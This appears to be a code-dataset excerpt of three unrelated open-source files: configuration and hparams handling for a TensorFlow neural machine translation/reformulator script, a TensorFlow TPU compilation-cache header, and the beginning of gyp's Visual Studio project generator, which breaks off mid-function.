parser.add_argument("--batch_size", type=int, default=128, help="Batch size.")
parser.add_argument(
"--steps_per_stats",
type=int,
default=100,
help=("How many training steps to do per stats logging."
"Save checkpoint every 10x steps_per_stats"))
parser.add_argument(
"--max_train",
type=int,
default=0,
help="Limit on the size of training data (0: no limit).")
parser.add_argument(
"--num_buckets",
type=int,
default=5,
help="Put data into similar-length buckets.")
# SPM
parser.add_argument(
"--subword_option",
type=str,
default="",
choices=["", "bpe", "spm"],
help="""\
Set to bpe or spm to activate subword desegmentation.\
""")
parser.add_argument(
"--subword_model",
type=str,
default=None,
help="""\
Full path to the subword model to be loaded. If None, no
subword is used.\
""")
# Misc
parser.add_argument(
"--num_gpus", type=int, default=1, help="Number of gpus in each worker.")
parser.add_argument(
"--log_device_placement",
type="bool",
nargs="?",
const=True,
default=False,
help="Debug GPU allocation.")
parser.add_argument(
"--metrics",
type=str,
default="bleu",
help=("Comma-separated list of evaluations "
"metrics (bleu,rouge,accuracy)"))
parser.add_argument(
"--steps_per_external_eval",
type=int,
default=None,
help="""\
How many training steps to do per external evaluation. Automatically set
based on data if None.\
""")
parser.add_argument(
"--steps_per_save",
type=int,
default=500,
help="How many training steps to do before saving.")
parser.add_argument(
"--scope", type=str, default=None, help="scope to put variables under")
parser.add_argument(
"--hparams_path",
type=str,
default=None,
help=("Path to standard hparams json file that overrides"
"hparams values from FLAGS."))
parser.add_argument(
"--random_seed",
type=int,
default=None,
help="Random seed (>0, set a specific seed).")
parser.add_argument(
"--override_loaded_hparams",
type="bool",
nargs="?",
const=True,
default=False,
help="Override loaded hparams with values specified")
parser.add_argument(
"--num_keep_ckpts",
type=int,
default=5,
help="Max number of checkpoints to keep.")
parser.add_argument(
"--avg_ckpts",
type="bool",
nargs="?",
const=True,
default=False,
help=("""\
Average the last N checkpoints for external evaluation.
N can be controlled by setting --num_keep_ckpts.\
"""))
parser.add_argument(
"--baseline_type",
type=int,
default=0,
help="Type of the reward baseline: "
"0: average reward per source. "
"1: use a neural (value) network. "
"2: average reward over the whole batch.")
parser.add_argument(
"--sample_id",
type=int,
default=-1,
help="ID of "
"the single sample to decode for debugging. "
"Random if negative.")
# Inference
parser.add_argument(
"--ckpt",
type=str,
default="",
help="Checkpoint file to load a model for inference.")
parser.add_argument(
"--inference_input_file",
type=str,
default=None,
help="Set to the text to decode.")
parser.add_argument(
"--inference_list",
type=str,
default=None,
help=("A comma-separated list of sentence indices "
"(0-based) to decode."))
parser.add_argument(
"--infer_batch_size",
type=int,
default=32,
help="Batch size for inference mode.")
parser.add_argument(
"--inference_output_file",
type=str,
default=None,
help="Output file to store decoding results.")
parser.add_argument(
"--inference_ref_file",
type=str,
default=None,
help=("""\
Reference file to compute evaluation scores (if provided).\
"""))
parser.add_argument(
"--infer_mode",
type=str,
default="greedy",
choices=[
"greedy",
"sample",
"beam_search",
"trie_beam_search",
"trie_sample",
"trie_greedy",
"diverse_beam_search",
],
help="Which type of decoder to use during inference.")
parser.add_argument(
"--beam_width",
type=int,
default=0,
help=("""\
beam width when using beam search decoder. If 0 (default), use standard
decoder with greedy helper.\
"""))
parser.add_argument(
"--diverse_beam_search_iterations",
type=int,
default=2,
help=("""\
Number of diverse beam search iterations to be performed. Only used
when infer_mode=diverse_beam_search. The final number of rewrites will be
diverse_beam_search_iterations * beam_width. Therefore, it must be greater
than 1 to have an effect different than standard beam search."\
"""))
parser.add_argument(
"--length_penalty_weight",
type=float,
default=0.0,
help="Length penalty for beam search.")
parser.add_argument(
"--sampling_temperature",
type=float,
default=1.0,
help=("Softmax temperature for sampling during RL, "
"0.0 means greedy decoding, values > 1.0 lead "
"to more randomness. Must be >= 0."))
parser.add_argument(
"--num_translations_per_input",
type=int,
default=1,
help=("""\
Number of translations generated for each sentence. This is only used for
inference.\
"""))
parser.add_argument(
"--trie_path",
type=str,
default=None,
help="Path to sstable file to build decoding trie. The"
" values of the saved tables should be protos of type"
" QAInstance.")
parser.add_argument("--optimize_ngrams_len", type=int, default=5,
help='Lenght of ngrams to optimize trie over.')
# Job info
parser.add_argument(
"--jobid", type=int, default=0, help="Task id of the worker.")
parser.add_argument(
"--num_workers",
type=int,
default=1,
help="Number of workers (inference only).")
parser.add_argument(
"--num_inter_threads",
type=int,
default=0,
help="number of inter_op_parallelism_threads")
parser.add_argument(
"--num_intra_threads",
type=int,
default=0,
help="number of intra_op_parallelism_threads")
# Reformulator
parser.add_argument(
"--replication_factor",
type=int,
default=1,
help="Each source is repeated this number of times. Note:"
" the overall batch size remains at batch_size, so"
" batch_size must be a multiple of replication_factor.")
parser.add_argument(
"--environment_server",
type=str,
default=None,
help="Address of the environment server.")
parser.add_argument(
"--environment_mode",
type=str,
default="searchqa",
choices=["squad", "searchqa"],
help=".")
parser.add_argument(
"--use_rl",
type=bool,
default=False,
help="If True, use REINFORCE training algorithm. If"
"False, use cross entropy loss.")
parser.add_argument(
"--entropy_regularization_weight",
type=float,
default=0.0,
help="Weight for the entropy regularization.")
parser.add_argument(
"--server_mode",
type=bool,
default=False,
help="If True, run in server mode.")
def create_hparams(flags):
  """Create training hparams from parsed command-line flags.

  Copies every flag value verbatim into a tf.contrib.training.HParams
  object; the groupings below mirror the flag groups registered in
  add_arguments().

  Args:
    flags: argparse Namespace of parsed command-line flags.

  Returns:
    A tf.contrib.training.HParams holding all data/model/training/inference
    configuration values.
  """
  return tf.contrib.training.HParams(
      # Data
      src=flags.src,
      tgt=flags.tgt,
      ctx=flags.ctx,
      train_prefix=flags.train_prefix,
      dev_prefix=flags.dev_prefix,
      test_prefix=flags.test_prefix,
      train_annotations=flags.train_annotations,
      dev_annotations=flags.dev_annotations,
      test_annotations=flags.test_annotations,
      vocab_prefix=flags.vocab_prefix,
      embed_prefix=flags.embed_prefix,
      out_dir=flags.out_dir,
      # Networks
      num_units=flags.num_units,
      num_layers=flags.num_layers,
      # Encoder/decoder depth falls back to num_layers when not set explicitly.
      num_encoder_layers=(flags.num_encoder_layers or flags.num_layers),
      num_decoder_layers=(flags.num_decoder_layers or flags.num_layers),
      dropout=flags.dropout,
      unit_type=flags.unit_type,
      encoder_type=flags.encoder_type,
      residual=flags.residual,
      num_embeddings_partitions=flags.num_embeddings_partitions,
      # Attention mechanisms
      attention=flags.attention,
      attention_architecture=flags.attention_architecture,
      output_attention=flags.output_attention,
      pass_hidden_state=flags.pass_hidden_state,
      # Train
      optimizer=flags.optimizer,
      num_train_steps=flags.num_train_steps,
      batch_size=flags.batch_size,
      init_op=flags.init_op,
      init_weight=flags.init_weight,
      max_gradient_norm=flags.max_gradient_norm,
      learning_rate=flags.learning_rate,
      warmup_steps=flags.warmup_steps,
      warmup_scheme=flags.warmup_scheme,
      decay_scheme=flags.decay_scheme,
      colocate_gradients_with_ops=flags.colocate_gradients_with_ops,
      # Data constraints
      num_buckets=flags.num_buckets,
      max_train=flags.max_train,
      src_max_len=flags.src_max_len,
      tgt_max_len=flags.tgt_max_len,
      # Inference
      src_max_len_infer=flags.src_max_len_infer,
      tgt_max_len_infer=flags.tgt_max_len_infer,
      infer_batch_size=flags.infer_batch_size,
      infer_mode=flags.infer_mode,
      beam_width=flags.beam_width,
      diverse_beam_search_iterations=flags.diverse_beam_search_iterations,
      length_penalty_weight=flags.length_penalty_weight,
      sampling_temperature=flags.sampling_temperature,
      num_translations_per_input=flags.num_translations_per_input,
      trie_path=flags.trie_path,
      optimize_ngrams_len=flags.optimize_ngrams_len,
      # Vocab
      # Fall back to the library defaults when the sos/eos flags are empty.
      sos=flags.sos if flags.sos else vocab_utils.SOS,
      eos=flags.eos if flags.eos else vocab_utils.EOS,
      subword_option=flags.subword_option,
      subword_model=flags.subword_model,
      check_special_token=flags.check_special_token,
      # Context
      context_vector=flags.context_vector,
      context_feed=flags.context_feed,
      context_delimiter=flags.context_delimiter,
      # Misc
      forget_bias=flags.forget_bias,
      num_gpus=flags.num_gpus,
      epoch_step=0,  # record where we were within an epoch.
      steps_per_stats=flags.steps_per_stats,
      steps_per_external_eval=flags.steps_per_external_eval,
      steps_per_save=flags.steps_per_save,
      share_vocab=flags.share_vocab,
      # The comma-separated metrics flag becomes a Python list here.
      metrics=flags.metrics.split(","),
      log_device_placement=flags.log_device_placement,
      random_seed=flags.random_seed,
      override_loaded_hparams=flags.override_loaded_hparams,
      num_keep_ckpts=flags.num_keep_ckpts,
      avg_ckpts=flags.avg_ckpts,
      num_intra_threads=flags.num_intra_threads,
      num_inter_threads=flags.num_inter_threads,
      sample_id=flags.sample_id,
      # Reformulator
      baseline_type=flags.baseline_type,
      replication_factor=flags.replication_factor,
      environment_server=flags.environment_server,
      environment_mode=flags.environment_mode,
      use_rl=flags.use_rl,
      entropy_regularization_weight=flags.entropy_regularization_weight,
      server_mode=flags.server_mode)
def extend_hparams(hparams):
  """Extend training hparams.

  Validates flag combinations, derives residual-layer counts, resolves
  vocab/embedding file paths, creates the output directory, and adds
  per-metric "best score" bookkeeping hparams.

  Args:
    hparams: HParams produced by create_hparams(); mutated in place.

  Returns:
    The same (mutated) hparams object.

  Raises:
    ValueError: on invalid encoder/attention/context/vocab configurations.
  """
  assert hparams.num_encoder_layers and hparams.num_decoder_layers
  # Hidden state can only be passed encoder->decoder when depths match.
  if hparams.num_encoder_layers != hparams.num_decoder_layers:
    hparams.pass_hidden_state = False
    utils.print_out("Num encoder layer %d is different from num decoder layer"
                    " %d, so set pass_hidden_state to False" %
                    (hparams.num_encoder_layers, hparams.num_decoder_layers))
  # Sanity checks
  if hparams.encoder_type == "bi" and hparams.num_encoder_layers % 2 != 0:
    raise ValueError("For bi, num_encoder_layers %d should be even" %
                     hparams.num_encoder_layers)
  if (hparams.attention_architecture in ["gnmt"] and
      hparams.num_encoder_layers < 2):
    raise ValueError(
        "For gnmt attention architecture, "
        "num_encoder_layers %d should be >= 2" % hparams.num_encoder_layers)
  # Set residual layers
  num_encoder_residual_layers = 0
  num_decoder_residual_layers = 0
  if hparams.residual:
    if hparams.num_encoder_layers > 1:
      num_encoder_residual_layers = hparams.num_encoder_layers - 1
    if hparams.num_decoder_layers > 1:
      num_decoder_residual_layers = hparams.num_decoder_layers - 1
    if hparams.encoder_type == "gnmt":
      # The first unidirectional layer (after the bi-directional layer) in
      # the GNMT encoder can't have residual connection due to the input is
      # the concatenation of fw_cell and bw_cell's outputs.
      num_encoder_residual_layers = hparams.num_encoder_layers - 2
      # Compatible for GNMT models
      if hparams.num_encoder_layers == hparams.num_decoder_layers:
        num_decoder_residual_layers = num_encoder_residual_layers
  hparams.add_hparam("num_encoder_residual_layers", num_encoder_residual_layers)
  hparams.add_hparam("num_decoder_residual_layers", num_decoder_residual_layers)
  if hparams.subword_option and hparams.subword_option not in ["spm", "bpe"]:
    raise ValueError("subword option must be either spm, or bpe")
  # Context sanity checks
  # Make sure if one is set, everything should be set
  if hparams.ctx is not None and (not hparams.context_vector or
                                  not hparams.context_feed):
    raise ValueError("If ctx file is provided, "
                     "both context_vector and context_feed have to be set")
  # Fires when context flags are set but no ctx file was given.
  if hparams.ctx is None and (hparams.context_vector or hparams.context_feed):
    raise ValueError("ctx must be provided ")
  if ((hparams.context_vector == "append" or hparams.context_feed == "append")
      and (hparams.context_vector != hparams.context_feed)):
    raise ValueError("context_vector and context_feed must be set to append")
  if (hparams.context_vector == "last_state" and
      hparams.context_feed != "decoder_hidden_state"):
    raise ValueError("context_feed must be set to decoder_hidden_state "
                     "when using last_state as context_vector")
  # NOTE(review): the --context_vector help text describes "bilstm_full",
  # but this check tests for "bilstm_all" — confirm which spelling is the
  # canonical value.
  if (hparams.context_vector == "bilstm_all" and
      hparams.context_feed != "encoder_output"):
    raise ValueError("context_feed must be set to encoder_output "
                     "when using bilstm_all as context_vector")
  # Flags
  utils.print_out("# hparams:")
  utils.print_out(" src=%s" % hparams.src)
  utils.print_out(" tgt=%s" % hparams.tgt)
  utils.print_out(" train_prefix=%s" % hparams.train_prefix)
  utils.print_out(" dev_prefix=%s" % hparams.dev_prefix)
  utils.print_out(" test_prefix=%s" % hparams.test_prefix)
  utils.print_out(" train_annotations=%s" % hparams.train_annotations)
  utils.print_out(" dev_annotations=%s" % hparams.dev_annotations)
  utils.print_out(" test_annotations=%s" % hparams.test_annotations)
  utils.print_out(" out_dir=%s" % hparams.out_dir)
  ## Vocab
  # Get vocab file names first
  if hparams.vocab_prefix:
    src_vocab_file = hparams.vocab_prefix + "." + hparams.src
    tgt_vocab_file = hparams.vocab_prefix + "." + hparams.tgt
  else:
    raise ValueError("hparams.vocab_prefix must be provided.")
  # Source vocab; check_vocab may rewrite the file (e.g. to insert special
  # tokens) and returns the final size and path.
  src_vocab_size, src_vocab_file = vocab_utils.check_vocab(
      src_vocab_file,
      hparams.out_dir,
      check_special_token=hparams.check_special_token,
      sos=hparams.sos,
      eos=hparams.eos,
      unk=vocab_utils.UNK)
  # Target vocab
  if hparams.share_vocab:
    utils.print_out(" using source vocab for target")
    tgt_vocab_file = src_vocab_file
    tgt_vocab_size = src_vocab_size
  else:
    tgt_vocab_size, tgt_vocab_file = vocab_utils.check_vocab(
        tgt_vocab_file,
        hparams.out_dir,
        check_special_token=hparams.check_special_token,
        sos=hparams.sos,
        eos=hparams.eos,
        unk=vocab_utils.UNK)
  hparams.add_hparam("src_vocab_size", src_vocab_size)
  hparams.add_hparam("tgt_vocab_size", tgt_vocab_size)
  hparams.add_hparam("src_vocab_file", src_vocab_file)
  hparams.add_hparam("tgt_vocab_file", tgt_vocab_file)
  # Pretrained Embeddings:
  hparams.add_hparam("src_embed_file", "")
  hparams.add_hparam("tgt_embed_file", "")
  if hparams.embed_prefix:
    src_embed_file = hparams.embed_prefix + "." + hparams.src
    tgt_embed_file = hparams.embed_prefix + "." + hparams.tgt
    # Only use embedding files that actually exist; otherwise keep "".
    if tf.gfile.Exists(src_embed_file):
      hparams.src_embed_file = src_embed_file
    if tf.gfile.Exists(tgt_embed_file):
      hparams.tgt_embed_file = tgt_embed_file
  # Check out_dir
  if not tf.gfile.Exists(hparams.out_dir):
    utils.print_out("# Creating output directory %s ..." % hparams.out_dir)
    tf.gfile.MakeDirs(hparams.out_dir)
  # Evaluation: track the best score (and its checkpoint dir) per metric.
  for metric in hparams.metrics:
    hparams.add_hparam("best_" + metric, 0)  # larger is better
    best_metric_dir = os.path.join(hparams.out_dir, "best_" + metric)
    hparams.add_hparam("best_" + metric + "_dir", best_metric_dir)
    tf.gfile.MakeDirs(best_metric_dir)
    if hparams.avg_ckpts:
      hparams.add_hparam("avg_best_" + metric, 0)  # larger is better
      best_metric_dir = os.path.join(hparams.out_dir, "avg_best_" + metric)
      hparams.add_hparam("avg_best_" + metric + "_dir", best_metric_dir)
      tf.gfile.MakeDirs(best_metric_dir)
  return hparams
def get_default_hparams():
  """Build an hparams object holding every flag's default value."""
  parser = argparse.ArgumentParser()
  add_arguments(parser)
  # Parsing an empty argv yields the registered defaults for every flag.
  return create_hparams(parser.parse_args([]))
def ensure_compatible_hparams(hparams, default_hparams, hparams_path):
  """Make sure the loaded hparams is compatible with new changes.

  New fields present in the defaults but missing from the loaded hparams
  are added; if override_loaded_hparams is set, every differing value is
  overwritten with the default.
  """
  default_hparams = utils.maybe_parse_standard_hparams(default_hparams,
                                                       hparams_path)
  defaults = default_hparams.values()
  current = hparams.values()
  # Backward compatibility: carry any newly introduced fields over.
  for name, value in defaults.items():
    if name not in current:
      hparams.add_hparam(name, value)
  # Optionally force every value back to the default.
  if default_hparams.override_loaded_hparams:
    for name, value in defaults.items():
      if getattr(hparams, name) != value:
        utils.print_out(
            "# Updating hparams.%s: %s -> %s" % (name, str(
                getattr(hparams, name)), str(value)))
        setattr(hparams, name, value)
  return hparams
def create_or_load_hparams(out_dir,
                           default_hparams,
                           hparams_path,
                           save_hparams=True):
  """Create hparams or load hparams from out_dir."""
  loaded = utils.load_hparams(out_dir)
  if loaded:
    # Reconcile previously saved hparams with the current defaults.
    hparams = ensure_compatible_hparams(loaded, default_hparams, hparams_path)
  else:
    # Fresh run: start from the defaults, apply any standard-hparams
    # overrides, then derive the extended fields.
    hparams = utils.maybe_parse_standard_hparams(default_hparams, hparams_path)
    hparams = extend_hparams(hparams)
  # Save HParams
  if save_hparams:
    utils.save_hparams(out_dir, hparams)
    for metric in hparams.metrics:
      utils.save_hparams(getattr(hparams, "best_" + metric + "_dir"), hparams)
  # Print HParams
  utils.print_hparams(hparams)
  return hparams
def run_main(flags, default_hparams, train_fn, inference_fn, target_session=""):
  """Run main.

  Seeds RNGs, resolves hparams, then dispatches to either inference (when
  --inference_input_file is set) or training.

  Args:
    flags: parsed command-line flags.
    default_hparams: HParams from create_hparams(), used when no saved
      hparams exist in out_dir.
    train_fn: callable(hparams, target_session=...) that runs training.
    inference_fn: callable(ckpt, input_file, trans_file, hparams,
      num_workers, jobid) that runs decoding.
    target_session: session target forwarded to train_fn.
  """
  # Job
  jobid = flags.jobid
  num_workers = flags.num_workers
  utils.print_out("# Job id %d" % jobid)
  # Random: offset the seed by jobid so workers draw different streams.
  random_seed = flags.random_seed
  if random_seed is not None and random_seed > 0:
    utils.print_out("# Set random seed to %d" % random_seed)
    random.seed(random_seed + jobid)
    np.random.seed(random_seed + jobid)
  ## Train / Decode
  out_dir = flags.out_dir
  if not tf.gfile.Exists(out_dir):
    tf.gfile.MakeDirs(out_dir)
  # Load hparams. Only worker 0 persists them to avoid write races.
  hparams = create_or_load_hparams(
      out_dir, default_hparams, flags.hparams_path, save_hparams=(jobid == 0))
  if flags.inference_input_file:
    # Inference indices: optional subset of sentence indices to decode.
    hparams.inference_indices = None
    if flags.inference_list:
      (hparams.inference_indices) = ([
          int(token) for token in flags.inference_list.split(",")
      ])
    # Inference; fall back to the latest checkpoint when --ckpt is empty.
    trans_file = flags.inference_output_file
    ckpt = flags.ckpt
    if not ckpt:
      ckpt = tf.train.latest_checkpoint(out_dir)
    inference_fn(ckpt, flags.inference_input_file, trans_file, hparams,
                 num_workers, jobid)
    # Evaluation: score the decoded output against the reference, if given.
    ref_file = flags.inference_ref_file
    if ref_file and tf.gfile.Exists(trans_file):
      for metric in hparams.metrics:
        score = evaluation_utils.evaluate(ref_file, trans_file, metric,
                                          hparams.subword_option)
        utils.print_out(" %s: %.1f" % (metric, score))
  else:
    # Train
    train_fn(hparams, target_session=target_session)
def main(unused_argv):
  """Entry point: build hparams from FLAGS and run train or inference."""
  hparams = create_hparams(FLAGS)
  run_main(FLAGS, hparams, train.train, inference.inference)
if __name__ == "__main__":
nmt_parser = argparse.ArgumentParser()
add_arguments(nmt_parser)
FLAGS, unparsed = nmt_parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed) | unknown | codeparrot/codeparrot-clean | ||
/* Copyright 2020 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#ifndef TENSORFLOW_CORE_TPU_KERNELS_COMPILED_SUBGRAPH_H_
#define TENSORFLOW_CORE_TPU_KERNELS_COMPILED_SUBGRAPH_H_
#include <memory>
#include <string>
#include <vector>
#include "tensorflow/core/platform/refcount.h"
#include "tensorflow/core/platform/status.h"
#include "tensorflow/core/tpu/kernels/tpu_program_group_interface.h"
namespace tensorflow {
namespace tpu {
// Forward declaration to avoid circular dependency.
class TpuCompilationCacheInterface;
// Cache for compiled TPU program.
//
// Each key identifies a unique subgraph, and the value is the vector of
// protos that are emitted by compiling the subgraph.
//
// When a subgraph is considered for compilation, the client calls
//
// auto subgraph_key = <compute key for subgraph>;
// auto compile_function = <lambda to compile subgraph into protos>;
// auto per_step_ref_holder = <container to control lifetime of cached
// results>;
// int64 uid;
// std::vector<string> proto_key;
// CompileIfKeyAbsent(subgraph_key, per_step_ref_holder, &uid, &proto_key,
// compile_function);
//
// where subgraph_key is the key computed for the subgraph. On success,
// proto_key contains a vector of keys, where proto_key[i] can be used to look
// up the ith proto compiled from the subgraph, and uid contains an identifier
// that can be used in place of key for clients that require cheap
// serializable handles. If the compiled protos were not present in the cache,
// compile_function would be called to generate them. per_step_ref_holder
// extends the lifetime of cached results: it is guaranteed that the protos
// indicated in proto_key will be available for lookup for at least as long as
// per_step_ref_holder is not deleted.
//
// If the caller passes nullptr instead of a per_step_ref_holder then the
// caller is responsible for calling Release(subgraph_key) once for every call
// to CompileIfKeyAbsent(subgraph_key, ...) to discard the reference to the
// compilation results, after the caller is sure it will not look up the
// compiled executables again.
//
// Subsequently the client can call
//
// std::unique_ptr<CompilationCacheEntryRef> entry;
// Lookup(proto_key, &entry);
// auto proto = entry->get();
//
// or
//
// std::unique_ptr<CompilationCacheEntryRef> entry;
// Lookup(uid, proto_index, &entry);
// auto proto = entry->get();
//
// to access a cached proto.
// TODO(misard) Switch the existing TPU ops to use uid+proto_index instead of
// string keys for proto lookups.
//
//
// Usage details within the system:
//
// This cache lives in the resource manager of the TPU_SYSTEM device where the
// compiler runs, typically worker 0 of the system. The cache is discarded and
// a new one created whenever the system is reinitialized.
//
// A compiled subgraph is placed into the cache using a key that is a
// combination of the function name, guaranteed_constants, the shapes of the
// dynamic inputs to the subgraph, and the function library in use at the time
// of execution.
//
// Whenever a compile Op is run, it looks to see if there is already an entry
// in the cache corresponding to that Op and the current dynamic shapes, and
// creates one if not. The entry is marked as most recently used in the cache
// by the compile Op. The entry is reference counted. The cache owns one entry
// , and each step that has executed a compile Op referring to the entry owns
// a reference until that step completes.
//
// If the cache exceeds a configured storage limit, entries are marked for
// eviction in order of least recently used. An entry is not evicted until all
// references to it are discarded, so an entry that is marked for eviction can
// still be looked up by the execute Ops in a running step. If another Compile
// Op looks up an entry that is marked for eviction, the entry will be
// unmarked and set to most recently used.
//
// One entry of the TPU compilation cache: the compiled artifacts for a
// single subgraph, plus the bookkeeping (LRU counter, reference counts,
// size estimate) the cache needs to manage it.
struct CompiledSubgraph : public core::RefCounted {
  TpuCompilationCacheInterface* parent = nullptr;  // Not owned.

  // True once the compilation function has run for this entry.
  bool initialized = false;

  // The Status returned by the compilation function when the entry is
  // initialized. This status will be returned to any client that requests the
  // entry.
  absl::Status initialization_status;

  // Counter to keep track of LRU entries for the eviction policy.
  int64_t last_use = -1;

  // The unique key describing this entry.
  std::string subgraph_key;

  // The uid describing this entry.
  int64_t uid;

  // Compilation cache proto key to identify the cache entry.
  std::vector<std::string> proto_key;

  // Fingerprints of sharding programs if there is any.
  std::vector<std::string> sharding_key;

  // The number of 'external' client-held references to the entry.
  int external_references = 0;

  // The sum of the SpaceUsed of each of the elements of programs; an estimate
  // of how much RAM the entry consumes, used to determine when entries must
  // be marked for eviction.
  int64_t total_size = 0;

  // Debug info in case we miss.
  std::string cache_entry_debug_string;

  // Entries representing the associated sharding and unsharding programs,
  // which share the same life time of the owning main entry, so we always use
  // the main entry's ref count.
  std::unique_ptr<CompiledSubgraph> sharding_entry;
  std::unique_ptr<CompiledSubgraph> unsharding_entry;

  // Only used for the nested sharding/unsharding entries to point to the
  // owning main entry.
  CompiledSubgraph* main_entry = nullptr;

  // Compiled TPU program group.
  std::unique_ptr<TpuProgramGroupInterface> tpu_program_group;

  // Computes total program size: this entry's program group size plus the
  // total_size of any nested sharding/unsharding entries. The CHECK enforces
  // that it is only called while total_size is still unset (i.e. before the
  // caller stores the result).
  size_t ComputeTotalSize() const {
    CHECK_EQ(total_size, 0);
    int64_t size = tpu_program_group->program_size();
    if (sharding_entry != nullptr) {
      size += sharding_entry->total_size;
    }
    if (unsharding_entry != nullptr) {
      size += unsharding_entry->total_size;
    }
    return size;
  }
};
} // namespace tpu
} // namespace tensorflow
#endif // TENSORFLOW_CORE_TPU_KERNELS_COMPILED_SUBGRAPH_H_ | c | github | https://github.com/tensorflow/tensorflow | tensorflow/core/tpu/kernels/compiled_subgraph.h |
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import copy
import ntpath
import os
import posixpath
import re
import subprocess
import sys
import gyp.common
import gyp.easy_xml as easy_xml
import gyp.MSVSNew as MSVSNew
import gyp.MSVSProject as MSVSProject
import gyp.MSVSSettings as MSVSSettings
import gyp.MSVSToolFile as MSVSToolFile
import gyp.MSVSUserFile as MSVSUserFile
import gyp.MSVSUtil as MSVSUtil
import gyp.MSVSVersion as MSVSVersion
from gyp.common import GypError
# TODO: Remove once bots are on 2.7, http://crbug.com/241769
def _import_OrderedDict():
import collections
try:
return collections.OrderedDict
except AttributeError:
import gyp.ordered_dict
return gyp.ordered_dict.OrderedDict
OrderedDict = _import_OrderedDict()
# Regular expression for validating Visual Studio GUIDs. If the GUID
# contains lowercase hex letters, MSVS will be fine. However,
# IncrediBuild BuildConsole will parse the solution file, but then
# silently skip building the target causing hard to track down errors.
# Note that this only happens with the BuildConsole, and does not occur
# if IncrediBuild is executed from inside Visual Studio. This regex
# validates that the string looks like a GUID with all uppercase hex
# letters.
# Raw string avoids the invalid '\-' string-escape warning on newer
# Pythons; the compiled pattern is byte-identical.
VALID_MSVS_GUID_CHARS = re.compile(r'^[A-F0-9\-]+$')

# Default values for gyp generator variables, expressed as MSVS build macros.
generator_default_variables = {
    'EXECUTABLE_PREFIX': '',
    'EXECUTABLE_SUFFIX': '.exe',
    'STATIC_LIB_PREFIX': '',
    'SHARED_LIB_PREFIX': '',
    'STATIC_LIB_SUFFIX': '.lib',
    'SHARED_LIB_SUFFIX': '.dll',
    'INTERMEDIATE_DIR': '$(IntDir)',
    'SHARED_INTERMEDIATE_DIR': '$(OutDir)obj/global_intermediate',
    'OS': 'win',
    'PRODUCT_DIR': '$(OutDir)',
    'LIB_DIR': '$(OutDir)lib',
    'RULE_INPUT_ROOT': '$(InputName)',
    'RULE_INPUT_DIRNAME': '$(InputDir)',
    'RULE_INPUT_EXT': '$(InputExt)',
    'RULE_INPUT_NAME': '$(InputFileName)',
    'RULE_INPUT_PATH': '$(InputPath)',
    'CONFIGURATION_NAME': '$(ConfigurationName)',
}

# The msvs specific sections that hold paths
generator_additional_path_sections = [
    'msvs_cygwin_dirs',
    'msvs_props',
]

generator_additional_non_configuration_keys = [
    'msvs_cygwin_dirs',
    'msvs_cygwin_shell',
    'msvs_large_pdb',
    'msvs_shard',
    'msvs_external_builder',
    'msvs_external_builder_out_dir',
    'msvs_external_builder_build_cmd',
    'msvs_external_builder_clean_cmd',
]

# List of precompiled header related keys.
precomp_keys = [
    'msvs_precompiled_header',
    'msvs_precompiled_source',
]

# Lazily-filled cache for _GetDomainAndUserName().
cached_username = None
cached_domain = None
# Based on http://code.activestate.com/recipes/576694/.
# NOTE(review): collections.MutableSet is the Python 2 location; on
# Python 3 this ABC lives in collections.abc (the alias was removed in
# 3.10) — confirm the supported interpreter range before porting.
class OrderedSet(collections.MutableSet):
  """A mutable set that iterates in insertion order.

  Backed by a dict mapping each key to a node of a circular doubly linked
  list; self.end is the sentinel node [None, prev, next].
  """

  def __init__(self, iterable=None):
    self.end = end = []
    end += [None, end, end]  # sentinel node for doubly linked list
    self.map = {}  # key --> [key, prev, next]
    if iterable is not None:
      # |= comes from MutableSet and calls add() per element.
      self |= iterable

  def __len__(self):
    return len(self.map)

  def discard(self, key):
    # Remove key if present: unlink its node from the list.
    if key in self.map:
      key, prev, next = self.map.pop(key)
      prev[2] = next
      next[1] = prev

  def __contains__(self, key):
    return key in self.map

  def add(self, key):
    # No-op for duplicates; otherwise splice a new node in before the
    # sentinel (i.e. at the logical end of the list).
    if key not in self.map:
      end = self.end
      curr = end[1]
      curr[2] = end[1] = self.map[key] = [key, curr, end]

  def update(self, iterable):
    # Bulk add, preserving first-seen order.
    for i in iterable:
      if i not in self:
        self.add(i)

  def __iter__(self):
    # Walk the linked list forward from the sentinel.
    end = self.end
    curr = end[2]
    while curr is not end:
      yield curr[0]
      curr = curr[2]
# TODO(gspencer): Switch the os.environ calls to be
# win32api.GetDomainName() and win32api.GetUserName() once the
# python version in depot_tools has been updated to work on Vista
# 64-bit.
def _GetDomainAndUserName():
  """Return a (domain, username) pair for the current Windows user.

  On non-Windows platforms returns placeholder values. Results are cached
  in the module-level cached_domain/cached_username globals, so the
  `net config Workstation` subprocess runs at most once.
  NOTE(review): the subprocess output is parsed with str regexes —
  Python-2-era code; on Python 3 communicate() returns bytes. Confirm
  interpreter before reuse.
  """
  if sys.platform not in ('win32', 'cygwin'):
    return ('DOMAIN', 'USERNAME')
  global cached_username
  global cached_domain
  if not cached_domain or not cached_username:
    # Prefer the environment; fall back to `net config Workstation` output.
    domain = os.environ.get('USERDOMAIN')
    username = os.environ.get('USERNAME')
    if not domain or not username:
      call = subprocess.Popen(['net', 'config', 'Workstation'],
                              stdout=subprocess.PIPE)
      config = call.communicate()[0]
      username_re = re.compile('^User name\s+(\S+)', re.MULTILINE)
      username_match = username_re.search(config)
      if username_match:
        username = username_match.group(1)
      domain_re = re.compile('^Logon domain\s+(\S+)', re.MULTILINE)
      domain_match = domain_re.search(config)
      if domain_match:
        domain = domain_match.group(1)
    cached_domain = domain
    cached_username = username
  return (cached_domain, cached_username)
fixpath_prefix = None
def _NormalizedSource(source):
"""Normalize the path.
But not if that gets rid of a variable, as this may expand to something
larger than one directory.
Arguments:
source: The path to be normalize.d
Returns:
The normalized path.
"""
normalized = os.path.normpath(source)
if source.count('$') == normalized.count('$'):
source = normalized
return source
def _FixPath(path):
  """Convert a path into the backslash form expected in a vcproj file.

  Relative, non-macro paths are first joined onto the module-level
  fixpath_prefix (when set); slashes become backslashes, the result is
